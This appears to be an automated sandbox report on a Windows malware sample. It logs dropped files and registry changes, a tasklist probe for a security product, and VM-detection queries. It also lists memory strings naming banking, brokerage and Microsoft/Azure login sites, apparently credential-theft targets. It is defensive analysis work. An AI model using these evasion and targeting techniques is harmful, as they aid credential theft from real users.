Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Section loaded: twinui.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Section loaded: umpdc.dll

Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH

Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: qnUFsmyxMm.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: qnUFsmyxMm.exe

Static file information: File size 2462720 > 1048576

Source: qnUFsmyxMm.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x23d600

Source: qnUFsmyxMm.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: qnUFsmyxMm.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: qnUFsmyxMm.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: qnUFsmyxMm.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: qnUFsmyxMm.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: qnUFsmyxMm.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: qnUFsmyxMm.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: qnUFsmyxMm.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: qnUFsmyxMm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: qnUFsmyxMm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: qnUFsmyxMm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: qnUFsmyxMm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: qnUFsmyxMm.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.exe.0.dr	Static PE information: real checksum: 0x9307ce should be: 0x880373
Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp.4.dr	Static PE information: real checksum: 0x33908a should be: 0x33af29
Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp.6.dr	Static PE information: real checksum: 0x33908a should be: 0x33af29

Source: qnUFsmyxMm.exe	Static PE information: section name: .fptable
Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.exe.0.dr	Static PE information: section name: .didata
Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp.4.dr	Static PE information: section name: .didata
Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp.6.dr	Static PE information: section name: .didata

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_009179B2 push 80FFFFFFh; ret	0_2_009179B7
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_00911DAC push ebx; retf	0_2_00911DAD
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007CCC30 push eax; mov dword ptr [esp], 959493C2h	0_2_007CCC31
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007C9EB0 push eax; mov dword ptr [esp], 9B9C9D9Eh	0_2_007C9EBE

Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	File created: C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	File created: C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	File created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-96L6E.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	File created: C:\Users\user\AppData\Local\Temp\is-CF3GQ.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	File created: C:\Users\user\AppData\Local\Temp\is-CF3GQ.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe	File created: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	File created: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	File created: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe	File created: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Jump to dropped file

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CF3GQ.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CF3GQ.tmp\_isetup\_isdecmp.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp

API coverage: 0.0 %

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe TID: 5608

Thread sleep time: -210000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: qnUFsmyxMm.exe, 00000000.00000003.3826295678.0000000003403000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: qnUFsmyxMm.exe, 00000000.00000003.3894490335.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3858760884.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3808879352.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915518558.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3868587610.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3980750648.0000000000D62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: qnUFsmyxMm.exe, 00000000.00000002.3980750648.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP~
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
